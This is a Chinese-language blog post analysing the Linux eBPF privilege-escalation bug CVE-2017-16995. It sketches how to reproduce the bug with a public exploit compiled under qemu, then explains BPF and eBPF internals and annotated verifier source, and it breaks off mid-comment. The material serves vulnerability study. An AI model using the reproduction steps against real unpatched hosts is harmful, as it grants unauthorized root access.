CVE-2017-16995是一个内核提权漏洞,最近PWN2OWN爆出了一个ebpf模块相关的提权漏洞,因此打算系统地学习一下ebpf这个内核模块,并复现和分析与之相关的内核漏洞,之前先知已经有rebeyond
前辈发了一篇分析文章《深入分析Ubuntu本地提权漏洞—【CVE-2017-16995】》,本篇文章将补充一部分ebpf的基础知识,为之后的其他漏洞复现做准备。
漏洞存在于内核版本小于4.13.9
的系统中,漏洞成因为kernel/bpf/verifier.c
文件中的check_alu_op
函数的检查问题,这个漏洞可以允许一个普通用户向系统发起拒绝服务攻击(内存破坏)或者提升到特权用户。
本次复现使用的是4.4.110
版本的内核,下载地址为Download。
下载源码之后编译内核得到二进制的内核文件,结合之前漏洞复现的文件系统启动qemu,使用exploit-db上的exp编译gcc ./poc.c -static -pthread -o poc
,打包进文件系统再重新启动qemu,运行编译后的文件即可提权成功。
ebpf是bpf模块的功能增强版本,我们先来了解一下bpf模块。BPF的全称为Berkeley Packet Filter
,顾名思义,这是一个用来做包过滤的架构。它也是tcpdump和wireshark实现的基础。BPF的两大核心功能是过滤和复制,以tcpdump为例,BPF一方面接受tcpdump经过libpcap转码后的滤包条件,根据这些规则过滤报文;另一方面也将符合条件的报文复制到用户空间,最终由libpcap发送给tcpdump。
BPF设计的架构如下,基本原理是网卡驱动在收到数据报文之后多出一条路径转发给内核的BPF模块,供其和用户态的程序交互使用。
我们这里使用tcpdump的-d参数查看我们过滤数据报文的实际规则,可以看到BPF有一套自己的指令集来过滤数据包。
╭─wz@wz-virtual-machine ~/Desktop/CTF/wangdingbei2020/zhuque/supersafe_vm ‹hexo*› ╰─$ sudo tcpdump -d -i ens33 tcp port 23 1 ↵ (000) ldh [12] (001) jeq #0x86dd jt 2 jf 8 #判断是否是ipv6,false则jmp到L8 (002) ldb [20] (003) jeq #0x6 jt 4 jf 19 (004) ldh [54] (005) jeq #0x17 jt 18 jf 6 (006) ldh [56] (007) jeq #0x17 jt 18 jf 19 (008) jeq #0x800 jt 9 jf 19 #判断是否是ipv4 (009) ldb [23] (010) jeq #0x6 jt 11 jf 19 #判断是否是tcp (011) ldh [20] (012) jset #0x1fff jt 19 jf 13 #检测是否是ip分片报文 (013) ldxb 4*([14]&0xf) (014) ldh [x + 14] #tcp报文中的src port位置 (015) jeq #0x17 jt 18 jf 16 (016) ldh [x + 16] #tcp报文中的dest port位置 (017) jeq #0x17 jt 18 jf 19 (018) ret #262144 #符合要求 (019) ret #0 #不符合要求
BPF采用的报文过滤设计全称是CFG(Control Flow Graph,控制流图)
,过滤器基于if-else的控制流图,具体的实现不再展开。
在内核filter文档有关于BPF开发的sample,每条指令的格式类似,都是一个8字节(64 bit)大小的结构体类型,code表明指令类型,jt/jf分别是条件为真/假时的跳转偏移,k用来做一些跳转的value或其他用处。
struct sock_filter { /* Filter block */ __u16 code; /* Actual filter code */ __u8 jt; /* Jump true */ __u8 jf; /* Jump false */ __u32 k; /* Generic multiuse field */ };
BPF的交互过程也是类似的,可以总结为以下几个步骤:
1. 使用sock = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))创建一个raw socket;
2. 使用setsockopt(s, SOL_SOCKET, SO_ATTACH_FILTER, &bpf, sizeof(bpf))里的SO_ATTACH_FILTER参数将bpf结构体传入内核;
3. 使用bytes = recv(s, buf, sizeof(buf), 0);即recv函数来获取过滤后的数据报文。

之后BPF引入了JIT编译代码优化性能,引入了seccomp功能添加沙箱,在kernel 3.15版本后引入了eBPF。
eBPF(extended BPF)引进之后之前的BPF被称为cBPF(classical BPF),相比于cBPF,eBPF做了很多大刀阔斧的改变,比如拿C写的BPF代码,基于map的全新交互方式,新的指令集,Verifier的引进等。
我们首先来看下eBPF的sample来了解基本的交互方式。
第一个示例只有一个.c文件,BPF代码需要自己构造,可以类比成C里嵌了汇编。
//./linux-4.4.110/samples/bpf/sock_example.c /* eBPF example program: * - creates arraymap in kernel with key 4 bytes and value 8 bytes * * - loads eBPF program: * r0 = skb->data[ETH_HLEN + offsetof(struct iphdr, protocol)]; * *(u32*)(fp - 4) = r0; * // assuming packet is IPv4, lookup ip->proto in a map * value = bpf_map_lookup_elem(map_fd, fp - 4); * if (value) * (*(u64*)value) += 1; * * - attaches this program to eth0 raw socket * * - every second user space reads map[tcp], map[udp], map[icmp] to see * how many packets of given protocol were seen on eth0 */ #include <stdio.h> #include <unistd.h> #include <assert.h> #include <linux/bpf.h> #include <string.h> #include <stdlib.h> #include <errno.h> #include <sys/socket.h> #include <arpa/inet.h> #include <linux/if_ether.h> #include <linux/ip.h> #include <stddef.h> #include "libbpf.h" static int test_sock(void) { int sock = -1, map_fd, prog_fd, i, key; long long value = 0, tcp_cnt, udp_cnt, icmp_cnt; //[1]使用bpf_create_map函数新建一个map,其中map类型为BPF_MAP_TYPE_ARRAY,模拟一个数组 map_fd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(key), sizeof(value), 256); if (map_fd < 0) { printf("failed to create map '%s'\n", strerror(errno)); goto cleanup; } //[2]编写eBPF代码,虽然指令集不同,但是跟x86的汇编代码非常类似 struct bpf_insn prog[] = { BPF_MOV64_REG(BPF_REG_6, BPF_REG_1), BPF_LD_ABS(BPF_B, ETH_HLEN + offsetof(struct iphdr, protocol) /* R0 = ip->proto */), BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4), /* *(u32 *)(fp - 4) = r0 */ BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), /* r2 = fp - 4 */ BPF_LD_MAP_FD(BPF_REG_1, map_fd), BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 2), BPF_MOV64_IMM(BPF_REG_1, 1), /* r1 = 1 */ BPF_RAW_INSN(BPF_STX | BPF_XADD | BPF_DW, BPF_REG_0, BPF_REG_1, 0, 0), /* xadd r0 += r1 */ BPF_MOV64_IMM(BPF_REG_0, 0), /* r0 = 0 */ BPF_EXIT_INSN(), }; //[3]使用bpf_prog_load函数加载eBPF代码到内核 prog_fd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, 
sizeof(prog),"GPL", 0); if (prog_fd < 0) { printf("failed to load prog '%s'\n", strerror(errno)); goto cleanup; } //[4]sock绑定lo网卡 sock = open_raw_sock("lo"); //[5]eBPF代码绑定socket if (setsockopt(sock, SOL_SOCKET, SO_ATTACH_BPF, &prog_fd,sizeof(prog_fd)) < 0) { printf("setsockopt %s\n", strerror(errno)); goto cleanup; } //[5]执行eBPF代码,根据给定的key过滤数据包,输出value从而打印出每1s内不同类型的数据包个数 for (i = 0; i < 10; i++) { key = IPPROTO_TCP; assert(bpf_lookup_elem(map_fd, &key, &tcp_cnt) == 0); key = IPPROTO_UDP; assert(bpf_lookup_elem(map_fd, &key, &udp_cnt) == 0); key = IPPROTO_ICMP; assert(bpf_lookup_elem(map_fd, &key, &icmp_cnt) == 0); printf("TCP %lld UDP %lld ICMP %lld packets\n", tcp_cnt, udp_cnt, icmp_cnt); sleep(1); } cleanup: /* maps, programs, raw sockets will auto cleanup on process exit */ return 0; } int main(void) { FILE *f; f = popen("ping -c5 localhost", "r"); (void)f; return test_sock(); }
第二个示例的功能和第一个一致,因此我们不再增加注释,只是给大家展示另一种eBPF开发的方式,也就是用C的形式写eBPF代码,这种写法大大解放了开发人员的工作。
首先编译sockex1_kern.c
到sockex1_kern.o
,在这个代码文件中定义了eBPF规则。
//./linux-4.4.110/samples/bpf/sock_example.c/sockex1_kern.c #include <uapi/linux/bpf.h> #include <uapi/linux/if_ether.h> #include <uapi/linux/if_packet.h> #include <uapi/linux/ip.h> #include "bpf_helpers.h" struct bpf_map_def SEC("maps") my_map = { .type = BPF_MAP_TYPE_ARRAY, .key_size = sizeof(u32), .value_size = sizeof(long), .max_entries = 256, }; SEC("socket1") int bpf_prog1(struct __sk_buff *skb) { int index = load_byte(skb, ETH_HLEN + offsetof(struct iphdr, protocol)); long *value; if (skb->pkt_type != PACKET_OUTGOING) return 0; value = bpf_map_lookup_elem(&my_map, &index); if (value) __sync_fetch_and_add(value, skb->len); return 0; } char _license[] SEC("license") = "GPL";
之后使用sockex1_user.c
加载eBPF代码到内核进而执行代码,过滤数据包得到value并输出。
#include <stdio.h> #include <assert.h> #include <linux/bpf.h> #include "libbpf.h" #include "bpf_load.h" #include <unistd.h> #include <arpa/inet.h> int main(int ac, char **argv) { char filename[256]; FILE *f; int i, sock; snprintf(filename, sizeof(filename), "%s_kern.o", argv[0]); if (load_bpf_file(filename)) { printf("%s", bpf_log_buf); return 1; } sock = open_raw_sock("lo"); assert(setsockopt(sock, SOL_SOCKET, SO_ATTACH_BPF, prog_fd, sizeof(prog_fd[0])) == 0); f = popen("ping -c5 localhost", "r"); (void) f; for (i = 0; i < 5; i++) { long long tcp_cnt, udp_cnt, icmp_cnt; int key; key = IPPROTO_TCP; assert(bpf_lookup_elem(map_fd[0], &key, &tcp_cnt) == 0); key = IPPROTO_UDP; assert(bpf_lookup_elem(map_fd[0], &key, &udp_cnt) == 0); key = IPPROTO_ICMP; assert(bpf_lookup_elem(map_fd[0], &key, &icmp_cnt) == 0); printf("TCP %lld UDP %lld ICMP %lld bytes\n", tcp_cnt, udp_cnt, icmp_cnt); sleep(1); } return 0; }
以上就是两种eBPF开发的基本方式,可以看到C语言编写eBPF代码更加简洁,这也是eBPF相比于cBPF的一个优势。
首先我们调用bpf_create_map
来新建一个attr变量,这个变量为联合类型,其成员变量随系统调用的类型不同而变化,之后对变量成员进行初始化赋值,包括map类型,key大小,value大小,以及最大容量。
之后调用sys_bpf
进而使用系统调用syscall(__NR_bpf, BPF_MAP_CREATE, attr, size);
创建一个map数据结构,最终返回map的文件描述符。这个文件是用户态和内核态共享的,因此后续内核态和用户态都可以对这块共享内存进行读写(可以参见下面的bpf_cmd)。
//lib/bpf.c int bpf_create_map(enum bpf_map_type map_type, int key_size,int value_size, int max_entries) { union bpf_attr attr; memset(&attr, '\0', sizeof(attr)); attr.map_type = map_type; attr.key_size = key_size; attr.value_size = value_size; attr.max_entries = max_entries; return sys_bpf(BPF_MAP_CREATE, &attr, sizeof(attr)); } //lib/bpf.c static int sys_bpf(enum bpf_cmd cmd, union bpf_attr *attr, unsigned int size) { return syscall(__NR_bpf, cmd, attr, size); } //bpf.h union bpf_attr { struct { /* anonymous struct used by BPF_MAP_CREATE command */ __u32 map_type; /* one of enum bpf_map_type */ __u32 key_size; /* size of key in bytes */ __u32 value_size; /* size of value in bytes */ __u32 max_entries; /* max number of entries in a map */ }; struct { /* anonymous struct used by BPF_MAP_*_ELEM commands */ __u32 map_fd; __aligned_u64 key; union { __aligned_u64 value; __aligned_u64 next_key; }; __u64 flags; }; struct { /* anonymous struct used by BPF_PROG_LOAD command */ __u32 prog_type; /* one of enum bpf_prog_type */ __u32 insn_cnt; __aligned_u64 insns; __aligned_u64 license; __u32 log_level; /* verbosity level of verifier */ __u32 log_size; /* size of user buffer */ __aligned_u64 log_buf; /* user supplied buffer */ __u32 kern_version; /* checked when prog_type=kprobe */ }; struct { /* anonymous struct used by BPF_OBJ_* commands */ __aligned_u64 pathname; __u32 bpf_fd; }; } __attribute__((aligned(8))); //bpf.h /* BPF syscall commands, see bpf(2) man-page for details. */ enum bpf_cmd { BPF_MAP_CREATE, BPF_MAP_LOOKUP_ELEM, BPF_MAP_UPDATE_ELEM, BPF_MAP_DELETE_ELEM, BPF_MAP_GET_NEXT_KEY, BPF_PROG_LOAD, BPF_OBJ_PIN, BPF_OBJ_GET, };
之后调用bpf_prog_load
函数来将用户的eBPF代码加载到内核,我在内核文件中看到了两个同名不同参的函数定义,根据eBPF的调用情况应当是先调用libbpf的这个函数,之后通过系统调用调用后面的函数。
可以看到在使用BPF_PROG_LOAD
这个命令时,变量的数据类型又会发生改变,其成员包括指令类型,指令起始地址,指令条数,使用的license(要求是GPL),日志地址,日志大小以及日志等级等。随后使用系统调用syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
去运行真正的函数。
在第二个函数中添加了部分注释帮助理解,其核心是在运行eBPF代码前使用verifier进行代码检查并对指令进行修正防止产生恶意的代码跳转。
//libbpf.c int bpf_prog_load(enum bpf_prog_type prog_type, const struct bpf_insn *insns, int prog_len, const char *license, int kern_version) { union bpf_attr attr = { .prog_type = prog_type, .insns = ptr_to_u64((void *) insns), .insn_cnt = prog_len / sizeof(struct bpf_insn), .license = ptr_to_u64((void *) license), .log_buf = ptr_to_u64(bpf_log_buf), .log_size = LOG_BUF_SIZE, .log_level = 1, }; /* assign one field outside of struct init to make sure any * padding is zero initialized */ attr.kern_version = kern_version; bpf_log_buf[0] = 0; return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr)); } //syscall.c /* last field in 'union bpf_attr' used by this command */ #define BPF_PROG_LOAD_LAST_FIELD kern_version static int bpf_prog_load(union bpf_attr *attr) { enum bpf_prog_type type = attr->prog_type; struct bpf_prog *prog; int err; char license[128]; bool is_gpl; //检查成员 if (CHECK_ATTR(BPF_PROG_LOAD)) return -EINVAL; /* copy eBPF program license from user space */ if (strncpy_from_user(license, u64_to_ptr(attr->license), sizeof(license) - 1) < 0) return -EFAULT; license[sizeof(license) - 1] = 0; /* eBPF programs must be GPL compatible to use GPL-ed functions */ is_gpl = license_is_gpl_compatible(license); //指令最大条数为4096 if (attr->insn_cnt >= BPF_MAXINSNS) return -EINVAL; //检查指令类型和内核版本 if (type == BPF_PROG_TYPE_KPROBE && attr->kern_version != LINUX_VERSION_CODE) return -EINVAL; if (type != BPF_PROG_TYPE_SOCKET_FILTER && !capable(CAP_SYS_ADMIN)) return -EPERM; //创建prog结构体,用来存储eBPF指令和其他参数 /* plain bpf_prog allocation */ prog = bpf_prog_alloc(bpf_prog_size(attr->insn_cnt), GFP_USER); if (!prog) return -ENOMEM; //获取锁 err = bpf_prog_charge_memlock(prog); if (err) goto free_prog_nouncharge; prog->len = attr->insn_cnt; //将用户的指令拷贝到prog结构体中 err = -EFAULT; if (copy_from_user(prog->insns, u64_to_ptr(attr->insns), prog->len * sizeof(struct bpf_insn)) != 0) goto free_prog; //默认的jitd为0 prog->orig_prog = NULL; prog->jited = 0; //设置引用计数为1 atomic_set(&prog->aux->refcnt, 1); 
prog->gpl_compatible = is_gpl ? 1 : 0; /* find program type: socket_filter vs tracing_filter */ err = find_prog_type(type, prog); if (err < 0) goto free_prog; //eBPF verifier会对我们的eBPF指令进行检查,一些恶意的代码或者死循环的将不会得到执行 /* run eBPF verifier */ err = bpf_check(&prog, attr); if (err < 0) goto free_used_maps; /* fixup BPF_CALL->imm field */ //修正指令中call和jmp的范围 fixup_bpf_calls(prog); /* eBPF program is ready to be JITed */ //JIT加载代码 err = bpf_prog_select_runtime(prog); if (err < 0) goto free_used_maps; err = bpf_prog_new_fd(prog); if (err < 0) /* failed to allocate fd */ goto free_used_maps; return err; free_used_maps: free_used_maps(prog->aux); free_prog: bpf_prog_uncharge_memlock(prog); free_prog_nouncharge: bpf_prog_free(prog); return err; }
之后调用setsockopt(sock, SOL_SOCKET, SO_ATTACH_BPF, &prog_fd,sizeof(prog_fd))
来将eBPF程序绑定到socket上,此后该socket上的每一个数据包都会执行这段eBPF代码,从而实现包过滤。
eBPF也有一套自己的指令集,可以想象成实现了一个VM,其中有11个虚拟寄存器,根据调用规则可以对应到我们x86的寄存器中。
R0 -- RAX R1 -- RDI R2 -- RSI R3 -- RDX R4 -- RCX R5 -- R8 R6 -- RBX R7 -- R13 R8 -- R14 R9 -- R15 R10 -- RBP
每条指令的格式如下,成员包括操作码,目标寄存器,源寄存器,偏移和立即数。
struct bpf_insn { __u8 code; /* opcode */ __u8 dst_reg:4; /* dest register */ __u8 src_reg:4; /* source register */ __s16 off; /* signed offset */ __s32 imm; /* signed immediate constant */ };
操作码共有8种大类,以低3bit区分不同操作码,BPF_ALU为计算指令,BPF_MISC为其他指令,其他指令根据名字就可以猜到其含义。
/* Instruction classes */ #define BPF_CLASS(code) ((code) & 0x07) #define BPF_LD 0x00 #define BPF_LDX 0x01 #define BPF_ST 0x02 #define BPF_STX 0x03 #define BPF_ALU 0x04 #define BPF_JMP 0x05 #define BPF_RET 0x06 #define BPF_MISC 0x07
eBPF指令的编码如下,低三个bits被用来做指令大类的标志。这部分我参考了官方的手册,这里可以看到0x6和0x7这两个指令类在上面源码中的命名实际上用的是cBPF的名字(BPF_RET/BPF_MISC),这里只介绍eBPF。
+----------------+--------+--------------------+ | 4 bits | 1 bit | 3 bits | | operation code | source | instruction class | +----------------+--------+--------------------+ (MSB) (LSB) Classic BPF classes: eBPF classes: BPF_LD 0x00 BPF_LD 0x00 BPF_LDX 0x01 BPF_LDX 0x01 BPF_ST 0x02 BPF_ST 0x02 BPF_STX 0x03 BPF_STX 0x03 BPF_ALU 0x04 BPF_ALU 0x04 BPF_JMP 0x05 BPF_JMP 0x05 BPF_RET 0x06 BPF_JMP32 0x06 BPF_MISC 0x07 BPF_ALU64 0x07
当指令类型为BPF_ALU or BPF_JMP
,第4个bit(source位)用来编码源操作数的类型,BPF_K表示使用32位的立即数作为源操作数,BPF_X表示使用源寄存器(src_reg)作为源操作数。MSB的4bit表示操作码。
当指令类型为BPF_ALU or BPF_ALU64
,实际指令类型为以下之一,也就是常见的运算指令。
BPF_ADD 0x00
BPF_SUB 0x10
BPF_MUL 0x20
BPF_DIV 0x30
BPF_OR 0x40
BPF_AND 0x50
BPF_LSH 0x60
BPF_RSH 0x70
BPF_NEG 0x80
BPF_MOD 0x90
BPF_XOR 0xa0
BPF_MOV 0xb0 /* eBPF only: mov reg to reg */
BPF_ARSH 0xc0 /* eBPF only: sign extending shift right */
BPF_END 0xd0 /* eBPF only: endianness conversion */
当指令类型为BPF_JMP or BPF_JMP32
,指令实际类型为以下之一,包括条件跳转和非条件跳转。
BPF_JA 0x00 /* BPF_JMP only */ BPF_JEQ 0x10 BPF_JGT 0x20 BPF_JGE 0x30 BPF_JSET 0x40 BPF_JNE 0x50 /* eBPF only: jump != */ BPF_JSGT 0x60 /* eBPF only: signed '>' */ BPF_JSGE 0x70 /* eBPF only: signed '>=' */ BPF_CALL 0x80 /* eBPF BPF_JMP only: function call */ BPF_EXIT 0x90 /* eBPF BPF_JMP only: function return */ BPF_JLT 0xa0 /* eBPF only: unsigned '<' */ BPF_JLE 0xb0 /* eBPF only: unsigned '<=' */ BPF_JSLT 0xc0 /* eBPF only: signed '<' */ BPF_JSLE 0xd0 /* eBPF only: signed '<=' */
举个小例子,如BPF_ADD | BPF_X | BPF_ALU
表示的含义是dst_reg = (u32) dst_reg + (u32) src_reg
,BPF_XOR | BPF_K | BPF_ALU
表示dst_reg = (u32) dst_reg ^ (u32) imm32
。
代码检测是eBPF的核心机制,总的检测可以分成两次,第一次使用DAG检查来避免循环,主要是对代码进行有向无环图检测。
第二次的检测则是模拟代码的执行,观测寄存器和栈的变化情况。
主要的检测函数为bpf_check
,注释部分补充了一些实现逻辑。
int bpf_check(struct bpf_prog **prog, union bpf_attr *attr) { char __user *log_ubuf = NULL; struct verifier_env *env; int ret = -EINVAL; //指令条数判断 if ((*prog)->len <= 0 || (*prog)->len > BPF_MAXINSNS) return -E2BIG; /* 'struct verifier_env' can be global, but since it's not small, * allocate/free it every time bpf_check() is called */ env = kzalloc(sizeof(struct verifier_env), GFP_KERNEL); if (!env) return -ENOMEM; env->prog = *prog; /* grab the mutex to protect few globals used by verifier */ mutex_lock(&bpf_verifier_lock); if (attr->log_level || attr->log_buf || attr->log_size) { /* user requested verbose verifier output * and supplied buffer to store the verification trace */ log_level = attr->log_level; log_ubuf = (char __user *) (unsigned long) attr->log_buf; log_size = attr->log_size; log_len = 0; ret = -EINVAL; /* log_* values have to be sane */ if (log_size < 128 || log_size > UINT_MAX >> 8 || log_level == 0 || log_ubuf == NULL) goto free_env; ret = -ENOMEM; log_buf = vmalloc(log_size); if (!log_buf) goto free_env; } else { log_level = 0; } /* look for pseudo eBPF instructions that access map FDs and * replace them with actual map pointers */ //将伪指令中操作map_fd的部分替换成map地址,注意这个地址是8字节的,因此在实现中用本指令的imm和下一条指令的2个4字节中存储了这个地址 /* store map pointer inside BPF_LD_IMM64 instruction insn[0].imm = (u32) (unsigned long) map; insn[1].imm = ((u64) (unsigned long) map) >> 32; */ ret = replace_map_fd_with_map_ptr(env); if (ret < 0) goto skip_full_check; env->explored_states = kcalloc(env->prog->len, sizeof(struct verifier_state_list *), GFP_USER); ret = -ENOMEM; if (!env->explored_states) goto skip_full_check; //控制流图检查死循环和不可能到达的跳转 ret = check_cfg(env); if (ret < 0) goto skip_full_check; env->allow_ptr_leaks = capable(CAP_SYS_ADMIN); //核心检查函数 ret = do_check(env); skip_full_check: while (pop_stack(env, NULL) >= 0); free_states(env); if (ret == 0) /* program is valid, convert *(u32*)(ctx + off) accesses */ ret = convert_ctx_accesses(env); if (log_level && log_len >= log_size - 1) { 
BUG_ON(log_len >= log_size); /* verifier log exceeded user supplied buffer */ ret = -ENOSPC; /* fall through to return what was recorded */ } /* copy verifier log back to user space including trailing zero */ if (log_level && copy_to_user(log_ubuf, log_buf, log_len + 1) != 0) { ret = -EFAULT; goto free_log_buf; } if (ret == 0 && env->used_map_cnt) { /* if program passed verifier, update used_maps in bpf_prog_info */ env->prog->aux->used_maps = kmalloc_array(env->used_map_cnt, sizeof(env->used_maps[0]), GFP_KERNEL); if (!env->prog->aux->used_maps) { ret = -ENOMEM; goto free_log_buf; } memcpy(env->prog->aux->used_maps, env->used_maps, sizeof(env->used_maps[0]) * env->used_map_cnt); env->prog->aux->used_map_cnt = env->used_map_cnt; /* program is valid. Convert pseudo bpf_ld_imm64 into generic * bpf_ld_imm64 instructions */ convert_pseudo_ld_imm64(env); } free_log_buf: if (log_level) vfree(log_buf); free_env: if (!env->prog->aux->used_maps) /* if we didn't copy map pointers into bpf_prog_info, release * them now. Otherwise free_bpf_prog_info() will release them. */ release_maps(env); *prog = env->prog; kfree(env); mutex_unlock(&bpf_verifier_lock); return ret; }
在这个函数中调用了do_check
根据不同的指令类型来做具体的合法性判断。使用的核心数据结构是reg_state
,bpf_reg_type
枚举变量用来表示寄存器的类型,初始化为NOT_INIT
struct reg_state { enum bpf_reg_type type; union { /* valid when type == CONST_IMM | PTR_TO_STACK */ int imm; /* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE | * PTR_TO_MAP_VALUE_OR_NULL */ struct bpf_map *map_ptr; }; }; static void init_reg_state(struct reg_state *regs) { int i; for (i = 0; i < MAX_BPF_REG; i++) { regs[i].type = NOT_INIT; regs[i].imm = 0; regs[i].map_ptr = NULL; } /* frame pointer */ regs[BPF_REG_FP].type = FRAME_PTR; /* 1st arg to a function */ regs[BPF_REG_1].type = PTR_TO_CTX; } /* types of values stored in eBPF registers */ enum bpf_reg_type { NOT_INIT = 0, /* nothing was written into register */ UNKNOWN_VALUE, /* reg doesn't contain a valid pointer */ PTR_TO_CTX, /* reg points to bpf_context */ CONST_PTR_TO_MAP, /* reg points to struct bpf_map */ PTR_TO_MAP_VALUE, /* reg points to map element value */ PTR_TO_MAP_VALUE_OR_NULL,/* points to map elem value or NULL */ FRAME_PTR, /* reg == frame_pointer */ PTR_TO_STACK, /* reg == frame_pointer + imm */ CONST_IMM, /* constant integer value */ };
static int do_check(struct verifier_env *env) { struct verifier_state *state = &env->cur_state; struct bpf_insn *insns = env->prog->insnsi; struct reg_state *regs = state->regs; int insn_cnt = env->prog->len; int insn_idx, prev_insn_idx = 0; int insn_processed = 0; bool do_print_state = false; init_reg_state(regs); insn_idx = 0; for (;;) { struct bpf_insn *insn; u8 class; int err; //指令条数检查 if (insn_idx >= insn_cnt) { verbose("invalid insn idx %d insn_cnt %d\n", insn_idx, insn_cnt); return -EFAULT; } insn = &insns[insn_idx]; class = BPF_CLASS(insn->code); //运行过的次数上限检查 if (++insn_processed > 32768) { verbose("BPF program is too large. Proccessed %d insn\n", insn_processed); return -E2BIG; } //检测该指令有无visit,主要通过env->explored_states的状态数组保存访问过的指令的状态 err = is_state_visited(env, insn_idx); if (err < 0) return err; if (err == 1) { /* found equivalent state, can prune the search */ if (log_level) { if (do_print_state) verbose("\nfrom %d to %d: safe\n", prev_insn_idx, insn_idx); else verbose("%d: safe\n", insn_idx); } goto process_bpf_exit; } if (log_level && do_print_state) { verbose("\nfrom %d to %d:", prev_insn_idx, insn_idx); print_verifier_state(env); do_print_state = false; } if (log_level) { verbose("%d: ", insn_idx); print_bpf_insn(env, insn); } //计算指令ALU if (class == BPF_ALU || class == BPF_ALU64) { //检查具体指令的合法性,比如是否使用了保留的field,使用的寄存器编号是否超过了模拟寄存器的最大编号,寄存器是否可读/写,寄存器值是否是指针等 err = check_alu_op(env, insn); if (err) return err; //BPF_LDX指令 } else if (class == BPF_LDX) { enum bpf_reg_type src_reg_type; /* check for reserved fields is already done */ /* check src operand */ err = check_reg_arg(regs, insn->src_reg, SRC_OP); if (err) return err; err = check_reg_arg(regs, insn->dst_reg, DST_OP_NO_MARK); if (err) return err; src_reg_type = regs[insn->src_reg].type; /* check that memory (src_reg + off) is readable, * the state of dst_reg will be updated by this func */ err = check_mem_access(env, insn->src_reg, insn->off, BPF_SIZE(insn->code), BPF_READ, insn->dst_reg); if (err) 
return err; if (BPF_SIZE(insn->code) != BPF_W) { insn_idx++; continue; } if (insn->imm == 0) { /* saw a valid insn * dst_reg = *(u32 *)(src_reg + off) * use reserved 'imm' field to mark this insn */ insn->imm = src_reg_type;//判断出了一种指令类型,即地址取值指令 } else if (src_reg_type != insn->imm && (src_reg_type == PTR_TO_CTX || insn->imm == PTR_TO_CTX)) { /* ABuser program is trying to use the same insn * dst_reg = *(u32*) (src_reg + off) * with different pointer types: * src_reg == ctx in one branch and * src_reg == stack|map in some other branch. * Reject it. */ verbose("same insn cannot be used with different pointers\n"); return -EINVAL; } //BPF_STX指令 } else if (class == BPF_STX) { enum bpf_reg_type dst_reg_type; if (BPF_MODE(insn->code) == BPF_XADD) { err = check_xadd(env, insn); if (err) return err; insn_idx++; continue; } /* check src1 operand */ err = check_reg_arg(regs, insn->src_reg, SRC_OP); if (err) return err; /* check src2 operand */ err = check_reg_arg(regs, insn->dst_reg, SRC_OP); if (err) return err; dst_reg_type = regs[insn->dst_reg].type; /* check that memory (dst_reg + off) is writeable */ err = check_mem_access(env, insn->dst_reg, insn->off, BPF_SIZE(insn->code), BPF_WRITE, insn->src_reg); if (err) return err; if (insn->imm == 0) { insn->imm = dst_reg_type; } else if (dst_reg_type != insn->imm && (dst_reg_type == PTR_TO_CTX || insn->imm == PTR_TO_CTX)) { verbose("same insn cannot be used with different pointers\n"); return -EINVAL; } //BPF_ST指令 } else if (class == BPF_ST) { if (BPF_MODE(insn->code) != BPF_MEM || insn->src_reg != BPF_REG_0) { verbose("BPF_ST uses reserved fields\n"); return -EINVAL; } /* check src operand */ err = check_reg_arg(regs, insn->dst_reg, SRC_OP); if (err) return err; /* check that memory (dst_reg + off) is writeable */ err = check_mem_access(env, insn->dst_reg, insn->off, BPF_SIZE(insn->code), BPF_WRITE, -1); if (err) return err; //BPF_JMP指令 } else if (class == BPF_JMP) { u8 opcode = BPF_OP(insn->code); //直接跳转CALL if (opcode == 
BPF_CALL) { if (BPF_SRC(insn->code) != BPF_K || insn->off != 0 || insn->src_reg != BPF_REG_0 || insn->dst_reg != BPF_REG_0) { verbose("BPF_CALL uses reserved fields\n"); return -EINVAL; } //在这个函数中会检查跳转的地址有无超过范围,函数的五个参数的参数类型(是否是key/value/map地址/stack_size等),更新返回值寄存器,更新reg_state等。 err = check_call(env, insn->imm); if (err) return err; } else if (opcode == BPF_JA) { if (BPF_SRC(insn->code) != BPF_K || insn->imm != 0 || insn->src_reg != BPF_REG_0 || insn->dst_reg != BPF_REG_0) { verbose("BPF_JA uses reserved fields\n"); return -EINVAL; } insn_idx += insn->off + 1; continue; } else if (opcode == BPF_EXIT) { if (BPF_SRC(insn->code) != BPF_K || insn->imm != 0 || insn->src_reg != BPF_REG_0 || insn->dst_reg != BPF_REG_0) { verbose("BPF_EXIT uses reserved fields\n"); return -EINVAL; } //r0保存返回值,bpf_exit为指令集合结束标志,在此之前检查有无写入值 /* eBPF calling convetion is such that R0 is used * to return the value from eBPF program. * Make sure that it's readable at this time * of bpf_exit, which means that program wrote * something into it earlier */ err = check_reg_arg(regs, BPF_REG_0, SRC_OP); if (err) return err; if (is_pointer_value(env, BPF_REG_0)) { verbose("R0 leaks addr as return value\n"); return -EACCES; } //遇到一个exit就结束一个分支,回退到分叉处执行另一个branch,类似于走迷宫遍历路径 process_bpf_exit: insn_idx = pop_stack(env, &prev_insn_idx); if (insn_idx < 0) { break; } else { do_print_state = true; continue; } } else { err = check_cond_jmp_op(env, insn, &insn_idx); if (err) return err; } } else if (class == BPF_LD) { u8 mode = BPF_MODE(insn->code); if (mode == BPF_ABS || mode == BPF_IND) { err = check_ld_abs(env, insn); if (err) return err; } else if (mode == BPF_IMM) { err = check_ld_imm(env, insn); if (err) return err; insn_idx++; } else { verbose("invalid BPF_LD mode\n"); return -EINVAL; } } else { verbose("unknown insn class %d\n", class); return -EINVAL; } insn_idx++; } return 0; } //很有意思的是我在这里发现了一个非递归的DFS伪代码,应该是拿来帮助读者理解check中深度优先算法实现的代码。 /* non-recursive DFS pseudo code * 1 procedure DFS-iterative(G,v): * 2 
